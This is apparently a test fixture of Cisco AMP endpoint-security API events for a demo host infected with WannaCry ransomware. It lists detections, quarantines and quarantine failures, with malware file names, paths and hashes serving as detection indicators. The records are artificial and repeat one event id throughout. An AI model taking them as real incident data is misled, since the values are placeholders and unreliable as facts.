+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 